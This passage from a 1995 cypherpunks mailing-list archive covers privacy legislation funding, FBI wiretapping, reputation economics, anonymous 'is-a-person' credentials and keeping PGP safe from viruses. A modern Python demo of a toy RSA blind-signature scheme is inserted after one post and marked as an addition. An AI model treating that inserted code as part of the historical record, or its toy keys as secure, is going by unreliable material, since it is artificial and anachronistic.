     Interested authors are encouraged to submit manuscripts for feature
     articles on Electronic Commerce and the Internet. Six papers are sought
     for a special feature for the June 1996 issue of the Communications of
     the ACM (CACM). Co-Guest Editors for the feature are Rick Austin and
     Ray Pyle of the Bell Atlantic Internet Services Center.

     Guidelines:
     Articles should be written for a general audience consisting of a
     range of experience and backgrounds, but aimed at the general
     practitioner.

     7000 to 10,000 words
     3 to 5 graphic inserts (optional)


     Topics:

     Internet Security
     Electronic Commerce Security
     Digital Signature
     Digital Cash
     Firewalls and gateways
     MIME and attachments
     Integrated EDI/Internet
     Effectiveness of the Internet for commerce
     Advances in Electronic Commerce
     Etc.

     Schedule:

     Finished manuscripts and Author Bio due December 1, 1995.

     Editors' comments back by December 15, 1995

     Photo Ready copy due Jan 10 1996.


     Mail or Email to

     Raymond Pyle
     13100 Columbia Pk E47
     Silver Spring, Md. 20904

     raymond.h.pyle@bell-atl.com
======================================================================
Mark Leighton Fisher                   Thomson Consumer Electronics
fisherm@indy.tce.com                   Indianapolis, IN

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joshua geller <joshua@isappp.got.net>
Date: Wed, 22 Nov 1995 04:17:05 +0800
To: Moroni <moroni@scranton.com>
Subject: Re: Are there enough FBI agents to handle Digital Telephony?????
In-Reply-To: <v02130512acd7941208f9@[199.125.128.5]>
Message-ID: <199511211948.LAA29791@isappp.got.net>
MIME-Version: 1.0
Content-Type: text/plain


moroni@scranton.com writes:

 >    If you ask me if there is something for them to worry about I have to 
 > in all good conscience say yes , if you ask if there is something for us 
 > to worry about again I have to say yes. I don't know if there is even a 
 > common ground for both sides to work towards because terrorism has grown 
 > to include the homegrown variety .

what are you talking about? there has always been homegrown terrorism.
at various times in the past it has been much more intense than it is
now. read a little bit about the history of the labor movement in this
country (ie, in the united states of america).

josh




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 22 Nov 1995 04:24:28 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: Proving I'm not Bob.
In-Reply-To: <Pine.3.89.9511211301.B20512-0100000@tesla.cc.uottawa.ca>
Message-ID: <Pine.SOL.3.91.951121115245.23025A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 21 Nov 1995 s1113645@tesla.cc.uottawa.ca wrote:

> I had an idea for an advertising based net-payment scheme that has 
> a particular security flaw making it totally untrustworthy unless it is
> possible to prove that you are not a particular person (the publisher 
> receiving the ad money) when consuming (viewing or otherwise) the ads.

Obvious approach probably makes the rest of the protocol useless but...
If you force everything to be signed using keys corresponding to 
certificates issued by a trusted agency, that CA can be used to guarantee 
the inequality. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JWRCLUM@aol.com
Date: Wed, 22 Nov 1995 01:38:32 +0800
To: cypherpunks@toad.com
Subject: Fwd: Corporate Crime and CDT Funding on behalf of so-called medical privacy
Message-ID: <951121120109_29631303@emout04.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain



---------------------
Forwarded message:
From:	gcook@tigger.jvnc.net (Gordon Cook)
Sender:	med-privacy@essential.org
Reply-to:	gcook@tigger.jvnc.net
To:	med-privacy@essential.org (Multiple recipients of list)
Date: 95-11-20 22:44:48 EST


     The following article appeared in the current issue of
Corporate Crime Reporter (Volume 9, Number 44, November 20, 1995,
page one).  It is redisseminated on the Internet with the 
permission of CCR.

SELF-PROCLAIMED "PUBLIC INTEREST" GROUP  HEAVILY FUNDED BY
COMPUTER, TELECOMMUNICATIONS, DATABANK CORPORATIONS THAT WOULD
BENEFIT FROM "MEDICAL PRIVACY" LEGISLATION GROUP SUPPORTS --
EQUIFAX, TRW, DUNN & BRADSTREET IN THE MIX                                 

     The Center for Democracy & Technology (CDT), a self-
proclaimed "public interest organization," is in fact heavily
funded by large private computer, telecommunications, and
databank corporations.
     Funders of CDT, a two-year old Washington, D.C.-based
advocacy organization, include Dunn & Bradstreet Corp., Equifax
Inc., and TRW Information Services, three large databank
corporations that stand to benefit from federal legislation CDT
actively helped shape and is shepherding through Congress.
     This year, CDT has received $699,643 from more than 30 large
corporations, including $100,000 from Microsoft, $75,000 from
AT&T, $60,000 from Bell Atlantic, $50,000 from Apple Computer,
$25,000 from IBM, $10,000 from TRW Information Services, $10,000
from Dunn & Bradstreet, $5,000 from Direct Marketing Association,
and $5,000 from Equifax Inc. (For a complete list of CDT's
funders, see At A Glance, page 16)
     At a hearing before the Senate Labor and Human Resources
Committee last week, CDT deputy director Janlori Goldman said
that CDT "strongly supports" legislation, S. 1360, sponsored by
Senators Robert Bennett (R-Utah) and Patrick Leahy (D-Vermont),
because it represents "the most comprehensive and strong privacy
bill the Congress has yet considered in this area."
     But opponents of the bill argue that the legislation is not
a privacy statute at all, but instead is a vehicle that would
legitimize the creation of large computerized databanks of
personal medical information, thus benefitting those companies
like TRW and Equifax that give financial support to CDT. The
legislation would allow for broad, unauthorized searches of those
databanks, opponents claim.
     In an interview, Goldman told Corporate Crime Reporter that
all of CDT's corporate funding is earmarked for other projects
and that none of the corporate funding is supporting her work on
the medical privacy bill.
     "The corporate funding is not related at all, in any way
shape or form to my work on this bill," Goldman said. "The reason
we are doing this bill is that I've worked on privacy issues for
a decade. The most important privacy issue to work on is the
passage of the medical records privacy legislation. That is a
very sincere issue for me."
     "None of the corporate support that CDT gets is related to
my work on this bill," Goldman emphasized. "None. Zippo."
     CDT's executive director, Jerry Berman agreed. "We have no
funding for the medical privacy project -- zero," Berman said.
     But critics of the CDT's position on the legislation were
skeptical.
     "During the Senate hearing this week, Senator Bennett was
angered at the suggestion that S. 1360 was an industry bill,"
said Jamie Love of Ralph Nader's Center for Study of Responsive
Law. "He claimed that he had widely consulted with privacy groups
and patient advocates. CDT's Janlori Goldman was the key person
who decided who was in the loop, and who was not in the loop on
this issue. Groups that were not receptive to the idea of massive
database systems of personal medical records were excluded from
deliberations."
     "To find out that CDT has been funded by companies such as
Equifax, TRW, Dunn & Bradstreet, IBM and the telephone companies
is remarkable, because these are among the groups who have the
most at stake in legitimizing and preserving the current system
of maintaining and managing medical records," Love said. "I think
that Janlori Goldman should have mentioned in her Senate
testimony that CDT was funded by corporations who have an
interest in this issue."
     "If CDT were doing its job, TRW and Equifax wouldn't want to
give it money," Love added.
     Harold Eist, president-elect of the American Psychiatric
Association, said that "any datagathering and large computer
company would clearly benefit from legislation that drives large
amounts of individually identified data about American citizens
into data banks without the knowledge and permission of those
American citizens." 
     "Selling that information would represent a gold mine for
those companies," Eist said.
     "It is not surprising that an organization with a
disingenuous name -- Center for Democracy & Technology -- would
be supporting a bill with a disingenuous name -- The Medical
Records Confidentiality Act," Eist said. "In fact, this bill
represents an effort to give away the privacy of American
citizens without their knowledge."
     "My understanding is that Janlori Goldman was involved in
writing the bill," Eist said. "It seems to me that as a former
civil libertarian, she should know very well that there are
loopholes in that bill regarding protections to privacy that you
could drive a Mack truck through." 
     "Unless people can be assured that their privacy will be
protected, there is little or no chance that they will reveal the
kind of tormented and dark secrets that they have to reveal to
recover from their illnesses," Eist said. "Confidentiality is the
sine qua non of medical treatment, and especially if it is
psychiatric medical treatment."
     A driving force behind the effort to derail the
Bennett/Leahy bill is Denise Nagel, a Boston physician who
organized the Coalition for Patient Rights of New England "to
restore confidentiality to the doctor-patient relationship."
     Nagel refused to comment on CDT's funding.
     At the Senate hearing last week, Nagel told the committee "I
have no industry ties."
     Nagel charged that S. 1360 was written "to advance the
interests of certain segments of the computer,
telecommunications, data processing and health-care industries."
     "With this bill they would be able to careen full speed
ahead to develop data networks that will give innumerable people
access to our medical records legally and without our knowledge,"
Nagel said.
     "I am convinced that S. 1360 is not at all primarily
concerned with the confidentiality of medical records," Nagel
told the committee. "It is just the opposite. It talks about
informed consent, but then authorizes the creation of databases
without patient knowledge or consent. It talks about individual
rights, and then allows police broad authority to search
databases directly instead of obtaining a specific record from
the patient's doctor. It talks about civil and criminal
sanctions, and then pre-empts all common law and most existing
and future state statutes. It talks about ensuring personal
privacy with respect to medical records, and then sets a ceiling
rather than a floor on medical confidentiality."

AT A GLANCE: CENTER FOR DEMOCRACY AND TECHNOLOGY FUNDING, 1994-1995

American Advertising Federation         500.00
America Online, Inc.                 25,000.00
Apple Computer Inc.                  50,000.00
AT&T                                 75,000.00
Bell Atlantic                        60,000.00
Business Software Alliance            6,000.00
Cellular Telecomm Indust Assn        10,000.00
CompuServ                            30,000.00
Delphi Internet Services Corp        10,000.00
Direct Marketing Association          5,000.00
Dunn & Bradstreet Corp               10,000.00
EMA                                   5,000.00
Equifax Inc.                          5,000.00
John Gilmore                          2,500.00
Hartford Foundation                 153,000.00    
IBM                                  25,000.00
Information Technology Industry       5,000.00
Interactive Digital Software          5,000.00
Lotus                                 6,250.00
MARC                                 80,000.00
MCI Telecommunications               15,000.00
Microsoft                           100,000.00
National Cable Television Assn       15,000.00
Netscape Communications Corp          5,000.00
Newspaper Association of Am           5,000.00
Nynex Government Affairs             25,000.00
Pacific Telesis                      25,000.00
Prodigy Service Company              10,000.00
Software Publishers Assn             10,000.00
Time Warner Inc                       5,000.00
TRW Information Svcs                 10,000.00
US Telephone Association             10,000.00
US West Inc                          10,000.00

Total Funding                        814,020.00

Received 1994                        114,377.00
Received 1995                        699,643.00

Total Funding                        814,020.00


Russell Mokhiber
russell@essential.org
voice: 202/429-6928







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Wed, 22 Nov 1995 06:00:34 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: towards a theory of reputation
Message-ID: <Pine.SUN.3.91.951121130450.19018A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Many of the topics discussed on this list are economic in nature.  
Unfortunately cypherpunks haven't attracted the attention of professional 
economists who might be willing to apply their analytic tools to these 
issues.  Reputation is one of these issues that is especially important.  
I'm not an economist, so I hope these ramblings do not discourage real 
economists from tackling reputation as a serious research project.

The first step toward a theory of reputation is defining what reputation 
is.  The definition should correspond closely enough to our common sense
notion of reputation so that our intuitions about it are not completely 
useless.  I think a good definition is this: Alice's reputation of Bob is 
her expectation of the results of future interactions with Bob.  If 
these interactions are mainly economic in nature, then we can represent 
Alice's reputation of Bob by a graph with the horizontal axis labeled 
price and the vertical axis labeled expected utility.  A point (x,y) on 
the graph means that Alice expects to get y utils in a business transaction 
where she pays Bob x dollars.  Given this definition, it is natural to say 
the Bob's reputation is the set of all other people's reputations of Bob.

A reputation system consists of a set of entities, each of whom has a 
reputation and a method by which he changes his reputation of others.  
I believe the most important question for a theory of reputation to answer 
is what is a good method (reputation algorithm) by which a person changes 
his reputation of others.  A good reputation algorithm must serve his 
self-interest; it must not be (too) costly to evaluate; its results must 
be stable; a reputation system where most people use the algorithm must 
be stable (i.e., the reputation system must be an evolutionarily stable 
system).

In a reputation based market, each entity's reputation has three values.  
First is the present value of expected future profits, given the reputation 
(let's call it the operating value).  Note that the entity's reputation 
allows him to make positive economic profits, because it makes him a 
price-maker to some extent.  Second is the profit he could make if he 
threw away his reputation by cheating all of his customers (throw-away 
value).  Third is the expected cost of recreating an equivalent reputation 
if he threw away his current one (replacement cost).

Now it is clear that if a reputation's throw-away value ever exceeds its 
operating value or replacement cost, its owner will, in self-interest, 
throw away his reputation by cheating his customers.  In a stable reputation 
system, this should happen very infrequently.  This property may be 
difficult to achieve, however, because only the reputation's owner knows 
what its values are, and they may fluctuate widely.  For example the 
operating value may suddenly decrease when his competitor announces
a major price cut, or the replacement cost may suddenly decrease when 
he succeeds subverting a respected reputation agency.

One way to answer some of these questions may be to create a model of 
a reputation system with a simple reputation algorithm and a simplified 
market, and determine by analysis or simulation whether it has the 
desirable properties.  I hope someone who has an economist friend can 
persuade him to do this.

Wei Dai

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLI9Ujl0sXKgdnV5AQECCQQAiHq+s3PfsEOJmk0ng9aETQwHVe5EvrA0
+0wimcO2IGf+Bix8J/bLtAlW2eEcXM90pMvBgv+Q4jTkvI5RvGyuMf5cvOgj6rTz
wj9aCqoltjHm/l1dfoWWCn4VSIU8OAJ6wKN/HRANQ5B56TPOgEkS2EDSM2C3w4m9
BgwcG5rBeA8=
=taTA
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Wed, 22 Nov 1995 02:51:44 +0800
To: cypherpunks@toad.com
Subject: Proving I'm not Bob.
Message-ID: <Pine.3.89.9511211301.B20512-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


I had an idea for an advertising based net-payment scheme that has 
a particular security flaw making it totally untrustworthy unless it is
possible to prove that you are not a particular person (the publisher 
receiving the ad money) when consuming (viewing or otherwise) the ads.

All its other flaws seem to be based on the same sort of identity denial 
problem. Damn!

Any protocols, cryptographic or otherwise?

TIA




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moroni <moroni@scranton.com>
Date: Wed, 22 Nov 1995 18:09:39 +0800
To: Peter Wayner <pcw@access.digex.net>
Subject: Re: Are there enough FBI agents to handle Digital Telephony?????
In-Reply-To: <v02130512acd7941208f9@[199.125.128.5]>
Message-ID: <Pine.LNX.3.91.951121134201.2872A-100000@prufrocks.scranton.com>
MIME-Version: 1.0
Content-Type: text/plain


    There is and probably never will be a shortage of people to carry on 
wire tapping. The term agent could be all encompassing in the future to 
include but not be limited to the hiring of ex-federally employed 
personnel with the talents or capacity for the talent to do wiretapping. 
In other words there are any number of ex-CIA, DEA, ex-military who if 
they were hired would actually save the government investigation time and 
costs because they have already gone through security clearance. Add to 
that the fact that most if not all FBI personnel have gone through a 
light wiretap course to familiarize them with the rudiments of the craft.
   All these figures add up to cover the taps in case a disaster of the 
terroristic kind should happen. I feel that numbers are there to worry 
people but that what the FBI is worrying about is whether it can cover 
large ground if there is a siege like state in this country. HOWEVER, 
there will always be those that opportunistically take advantage of 
circumstances to set up their own invisible little fiefdoms along the 
political and social terrain. 
   If you ask me if there is something for them to worry about I have to 
in all good conscience say yes, if you ask if there is something for us 
to worry about again I have to say yes. I don't know if there is even a 
common ground for both sides to work towards because terrorism has grown 
to include the homegrown variety.
 
                     Deirdre




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Scheidt <david@math.earlham.edu>
Date: Wed, 22 Nov 1995 03:56:32 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: Proving I'm not Bob.
In-Reply-To: <Pine.3.89.9511211301.B20512-0100000@tesla.cc.uottawa.ca>
Message-ID: <Pine.NXT.3.91.951121142858.1144A-100000@litoria>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 21 Nov 1995 s1113645@tesla.cc.uottawa.ca wrote:

> I had an idea for an advertising based net-payment scheme that has 
> a particular security flaw making it totally untrustworthy unless it is
> possible to prove that you are not a particular person (the publisher 
> receiving the ad money) when consuming (viewing or otherwise) the ads.

What is this system?  I can't think of any system that wouldn't work if 
rearranged so that instead of proving you aren't Bob, you simply don't 
prove that you are.  It is true that they are not isomorphic, and that 
could be a problem in some situations, but I don't see this as one of them.

david
--------
David_Scheidt@math.earlham.edu

yip yip yip yap yap yak yap yip *BANG*  -- no terrier






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 22 Nov 1995 07:07:41 +0800
To: cypherpunks@toad.com
Subject: Re: Proving I'm not Bob.
In-Reply-To: <Pine.3.89.9511211301.B20512-0100000@tesla.cc.uottawa.ca>
Message-ID: <199511212233.OAA16781@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


s1113645@tesla.cc.uottawa.ca writes:

>I had an idea for an advertising based net-payment scheme that has 
>a particular security flaw making it totally untrustworthy unless it is
>possible to prove that you are not a particular person (the publisher 
>receiving the ad money) when consuming (viewing or otherwise) the ads.

BTW, we had some interesting postings here last year from Jason Solinsky
(solman@mit.edu) about schemes involving advertising and payment, where
people would get paid to view advertisements.  Is this the kind of thing
you're thinking of?

I posted some ideas once on how to prove that you are not someone else.
Any such scheme has to be grounded in a physical mechanism to determine that
two people are different.  For example, you might be able to get some
special cryptographic signature or credential from an agency by showing
some biometric information, such as retina or thumb prints.  You wouldn't
necessarily have to reveal your name, identity, or any other information;
just something which would allow the agency to be sure that they had not
given such a credential out to you before.

If you didn't care about privacy, your problem could then be solved
simply by having each person exhibit his credential (these are often
called "is-a-person" credentials).  The more interesting question then
becomes exhibiting that credential in a privacy protecting way, but
still being able to tell if two people are showing the same or
different credentials.

There are various ways of doing this; one of the simplest would be for
the agency to give you a blind signature using a particular exponent,
where you would be allowed exactly one of each exponent.  You unblind
these, and to show you aren't Bob both you and Bob show your signatures
for some matching exponent, which will be different.  Because of the
blinding, no one will link the credential to your identifying
information, and because it is a signature from the agency, no one can
forge a credential different from the one they have.

Depending on the situation and your tradeoffs between convenience and
privacy, you might discard used credentials (for maximum privacy), or
you might reuse them in a particular forum where you have persistent
identity (for maximum convenience).  In the latter case, the exponent
used could be associated with the forum, which is the idea behind
Chaum's pseudonym system.

Hal Finney
hfinney@shell.portal.com
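
The one-credential-per-exponent scheme Hal Finney describes above, as an added Python example that is not part of the original post: an agency blind-signs a serial number the person picks, refuses a second signature for the same exponent, and two people show they are distinct by exhibiting different valid signatures under the matching exponent. The `Agency` and `Person` classes, the forum names, the biometric strings and the toy Mersenne-prime modulus are all assumptions made for the demonstration.

```python
import hashlib
import secrets
from math import gcd

# Toy RSA primes (two Mersenne primes), constructed for this demo only;
# a real agency would use large random primes.
P, Q = 2**127 - 1, 2**89 - 1


def digest(serial: bytes, n: int) -> int:
    """Map a credential serial number into Z_n; this is the value signed."""
    return int.from_bytes(hashlib.sha256(serial).digest(), "big") % n


def _is_odd_prime(e: int) -> bool:
    return all(e % d for d in range(3, int(e**0.5) + 1, 2))


class Agency:
    """Hypothetical issuer: one blind signature per (person, exponent)."""

    def __init__(self, forums):
        self.n = P * Q
        phi = (P - 1) * (Q - 1)
        usable = (e for e in range(3, 10_000, 2)
                  if _is_odd_prime(e) and gcd(e, phi) == 1)
        # One public exponent per forum, all under the same modulus.
        self.exponent = {forum: next(usable) for forum in forums}
        self._d = {f: pow(e, -1, phi) for f, e in self.exponent.items()}
        self._issued = set()

    def sign_blinded(self, biometric: str, forum: str, blinded: int) -> int:
        # The biometric only answers "has this body been served before?".
        tag = (hashlib.sha256(biometric.encode()).hexdigest(), forum)
        if tag in self._issued:
            raise PermissionError("already issued for this exponent")
        self._issued.add(tag)
        return pow(blinded, self._d[forum], self.n)


class Person:
    def __init__(self, biometric: str):
        self.biometric = biometric
        self.credential = {}    # forum -> (serial, signature)
        self.agency_view = {}   # forum -> (blinded value, blinded signature)

    def enroll(self, agency: Agency, forum: str) -> None:
        n, e = agency.n, agency.exponent[forum]
        serial = secrets.token_bytes(16)
        r = secrets.randbelow(n - 2) + 2        # blinding factor
        while gcd(r, n) != 1:
            r = secrets.randbelow(n - 2) + 2
        blinded = digest(serial, n) * pow(r, e, n) % n
        blind_sig = agency.sign_blinded(self.biometric, forum, blinded)
        sig = blind_sig * pow(r, -1, n) % n     # unblind: (h * r^e)^d / r = h^d
        self.credential[forum] = (serial, sig)
        self.agency_view[forum] = (blinded, blind_sig)


def verify(agency: Agency, forum: str, cred) -> bool:
    serial, sig = cred
    return pow(sig, agency.exponent[forum], agency.n) == digest(serial, agency.n)


def are_different_people(agency, forum, cred_a, cred_b) -> bool:
    """Both credentials verify under the forum's exponent and differ."""
    return (verify(agency, forum, cred_a) and verify(agency, forum, cred_b)
            and cred_a[1] != cred_b[1])


def demo() -> dict:
    agency = Agency(["ad-network", "mailing-list"])
    alice = Person("alice-retina (constructed)")
    bob = Person("bob-retina (constructed)")
    alice.enroll(agency, "ad-network")
    bob.enroll(agency, "ad-network")
    a, b = alice.credential["ad-network"], bob.credential["ad-network"]
    try:  # a second credential for the same exponent must be refused
        alice.enroll(agency, "ad-network")
        refused = False
    except PermissionError:
        refused = True
    forged = (a[0], (a[1] + 1) % agency.n)      # not a signature from the agency
    blinded, blind_sig = alice.agency_view["ad-network"]
    return {
        "alice_valid": verify(agency, "ad-network", a),
        "bob_valid": verify(agency, "ad-network", b),
        "alice_is_not_bob": are_different_people(agency, "ad-network", a, b),
        "bob_vs_bob": are_different_people(agency, "ad-network", b, b),
        "second_issue_refused": refused,
        "forgery_valid": verify(agency, "ad-network", forged),
        # Unlinkability: nothing the agency handled equals what is later shown.
        "agency_saw_credential": (blind_sig == a[1]
                                  or blinded == digest(a[0], agency.n)),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Mapping each forum to its own exponent follows the post's closing remark about reusing a credential where a persistent identity is wanted.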




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ethridge@Onramp.NET (Allen B. Ethridge)
Date: Wed, 22 Nov 1995 05:06:13 +0800
To: cypherpunks@toad.com
Subject: Re: Are there enough FBI agents to handle Digital Telephony?????
Message-ID: <v02130500acd7e7228be6@[199.1.154.51]>
MIME-Version: 1.0
Content-Type: text/plain


In addition to the large quantity they want, they also want to be able to
deliver the conversation from a mobile suspect to mobile agents who are
following the suspect.  So even if you use a digital set with "voice
privacy" activated that government car behind you might still be listening
to you.

The FBI's "requirements" present an entertaining set of logistical
problems.  Simply equipping the switches to handle the extra capacity,
especially during busy hour, is problematic.

        allen






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Erik E. Fair"  (Time Keeper) <fair@clock.org>
Date: Wed, 22 Nov 1995 07:24:04 +0800
To: cypherpunks@toad.com
Subject: "The Right To Privacy" by Caroline Kennedy, et. al.
Message-ID: <v02110118acd807aa64e2@[198.68.110.3]>
MIME-Version: 1.0
Content-Type: text/plain


In an EPIC Alert on 10:46 10/23/95, Dave Banisar wrote:

>"The Right to Privacy," November 9.  Authors Caroline Kennedy and Ellen
>Alderman discuss their new book on privacy.  Lisner Auditorium, George
>Washington University, Washington, DC.  Contact 202/357-3030.

Did anyone here go to this event, or has anyone read the book yet? There is a
review of it in TIME magazine at this URL:

http://pathfinder.com/@@iEPVLuF5EgMAQChZ/time/magazine/domestic/1995/951106/publishing.html

thanks,

Erik Fair






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <dreschs@mpd.tandem.com>
Date: Wed, 22 Nov 1995 05:56:01 +0800
To: cypherpunks@toad.com
Subject: Re: "Junk E-Mail"
In-Reply-To: <199511211647.RAA15185@utopia.hacktic.nl>
Message-ID: <199511212111.PAA12087@galil.austnsc.tandem.com>
MIME-Version: 1.0
Content-Type: text/plain


nobody@REPLAY.COM (Anonymous) said:

A> Sten wrote:
>> They (as in, the government) have used the RICO laws against Operation
>> Rescue, an anti-abortion/pro-life (pick your term) group for
>> protesting/picketing abortion clinics and doctors who perform
>> abortions.

A>       And for successfully encouraging the murder of doctors.

	Sorry, but the RICO case had nothing to do with any of the
murders.  And if you're gonna go after OR&company for encouraging the
murder of doctors, I hope you're also going after certain rappers for
encouraging the murder of police.

>> If they had prosecuted under statutes which applied to everyone, I
>> wouldn't have had a problem, but they are going after OR and similar
>> organizations for using tactics similar to those used by civil rights
>> protesters in the 60s.

A>       Who were systematically arrested, beaten, teargassed,
A> wiretapped, and even occasionally shot at. I *know*--I got firehosed,
A> beaten, arrested, and wiretapped for what I did. That's why I'm a
A> Cypherpunk now.  OR has received far better treatment than the civil
A> rights protesters ever did--or did I miss the news items reporting
A> that Terry Randall and Ralph Reed had been assassinated, and that
A> their lieutenants had been bumped off in black-bag jobs, and that
A> their colleagues were chained down to chairs *in court*?

	And the treatment you received then was wrong.  Does that make
admittedly less violent treatment of OR&company right?  At risk of your
calling it a 'nursery rhyme', or something similarly trivializing, two
wrongs don't make a right.

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 22 Nov 1995 07:59:27 +0800
To: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Subject: Re: Virus attacks on PGP
Message-ID: <199511212326.PAA06093@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  8:34 11/21/95 -0500, SINCLAIR  DOUGLAS N wrote:
>> Certainly having PGP run from a CDROM or other read-only device would be a
>> big help.  Even better would be to have all the privileged code also run
>> from a read-only device.
>
>Seeing as PGP is quite small the simplest and cheapest read-only device
>would be a write-protected floppy disk.

But do remember that your copy of PGP could be infected as it is loaded
from the disk.  You really need to protect your privileged code too.

Bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 22 Nov 1995 08:09:13 +0800
To: cypherpunks@toad.com
Subject: Re: towards a theory of reputation
In-Reply-To: <Pine.SUN.3.91.951121130450.19018A-100000@eskimo.com>
Message-ID: <199511212332.PAA24563@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Wei Dai <weidai@eskimo.com> writes:

>The first step toward a theory of reputation is defining what reputation 
>is.  The definition should correspond closely enough to our common sense
>notion of reputation so that our intuitions about it are not completely 
>useless.  I think a good definition is this: Alice's reputation of Bob is 
>her expectation of the results of future interactions with Bob.  If 
>these interactions are mainly economic in nature, then we can represent 
>Alice's reputation of Bob by a graph with the horizontal axis labeled 
>price and the vertical axis labeled expected utility.  A point (x,y) on 
>the graph means that Alice expects to get y utils in a business transaction 
>where she pays Bob x dollars.  Given this definition, it is natural to say 
>that Bob's reputation is the set of all other people's reputations of Bob.

This is an interesting approach.  However this seems to fold in issues of
reliability with issues of quality and value.  If I have a choice of two
vendors, one of whom produces a product which is twice as good, but there
is a 50% chance that he will abscond with my money, I am not sure how to
value him compared with the other.  It seems like the thrust of the
analysis later is to determine whether people will in fact try to
disappear.  But that is not well captured IMO by an analysis which just
ranks people in terms of "utility" for the price.

>A reputation system consists of a set of entities, each of whom has a 
>reputation and a method by which he changes his reputation of others.  
>I believe the most important question for a theory of reputation to answer 
>is what is a good method (reputation algorithm) by which a person changes 
>his reputation of others.  A good reputation algorithm must serve his 
>self-interest; it must not be (too) costly to evaluate; its results must 
>be stable; a reputation system where most people use the algorithm must 
>be stable (i.e., the reputation system must be an evolutionarily stable 
>system).

I am not sure about this last point.  It seems to me that a good
reputation is one which is most cost-effective for its owner.  Whether it
is good for social stability is not relevant to the person who is
deciding whether to use it.  ("But what if everyone behaved that way?
How would you feel then?")  It may be nice for the analyst but not for
the participant.

>In a reputation based market, each entity's reputation has three values.  
>First is the present value of expected future profits, given the reputation 
>(let's call it the operating value).  Note that the entity's reputation 
>allows him to make positive economic profits, because it makes him a 
>price-maker to some extent.  Second is the profit he could make if he 
>threw away his reputation by cheating all of his customers (throw-away 
>value).  Third is the expected cost of recreating an equivalent reputation 
>if he threw away his current one (replacement cost).

I don't really know what the first one means.  There are a lot of
different ways I can behave, which will have impact on my reputation, but
also on my productivity, income, etc.  There are other ways I can damage
my reputation than by cheating, too.  I can be sloppy or careless or just
not work very hard.  So the first two are really part of a continuum of
various strategies I may apply in life.  The second is pretty clear but
the first seems to cover too wide a range to give it a value.

>Now it is clear that if a reputation's throw-away value ever exceeds its 
>operating value or replacement cost, its owner will, in self-interest, 
>throw away his reputation by cheating his customers.  In a stable reputation 
>system, this should happen very infrequently.  This property may be 
>difficult to achieve, however, because only the reputation's owner knows 
>what its values are, and they may fluctuate widely.  For example the 
>operating value may suddenly decrease when his competitor announces
>a major price cut, or the replacement cost may suddenly decrease when 
>he succeeds in subverting a respected reputation agency.

It would be useful to make some of the assumptions a bit clearer here.
Is this a system in which cheating is unpunishable other than by loss of
reputation, our classic anonymous marketplace?  Even if so, there may be
other considerations.  For example, cheating may have costs, such as
timing the various frauds so that people don't find out and extricate
themselves from vulnerable situations before they can get stung.  Also,
as has been suggested here in the past, people may structure their
interactions so that vulnerabilities to cheating are minimized, reducing
the possible profits from that strategy.

>One way to answer some of these questions may be to create a model of 
>a reputation system with a simple reputation algorithm and a simplified 
>market, and determine by analysis or simulation whether it has the 
>desirable properties.  I hope someone who has an economist friend can 
>persuade him to do this.

It might be interesting to do something similar to Axelrod's Evolution
of Cooperation, where (human-written) programs played the Prisoner's
Dilemma against each other.  In that game, programs had reputations in
a sense, in that each program when it interacted with another
remembered all their previous interactions, and chose its behavior
accordingly.  The PD is such a cut-throat game that it apparently
didn't prove useful to try to create an elaborate reputation-updating
model (at least in the first tournaments; I understand that in later
versions some programs with slightly non-trivial complexity did well).

What you might want to do, for simplicity, is to have your universe
consist of just one good (or service, or whatever), with some producers
who all have the same ability, and some consumers, all with the same
needs.  Where they differ would be in their strategies for when to
cheat, when to be honest, when to trust, and when to be careful.

At any given time a consumer must choose which producer to buy from.
The details of their interaction would appear to greatly influence the
importance of reputation.  Maybe there could be a tradeoff where if the
consumer is willing to pay in advance he gets a better price than if he
will only provide cash on delivery.  (Unfortunately it seems like the
details of this tradeoff will basically determine the outcome of the
experiment.  However maybe some values will lead to interesting
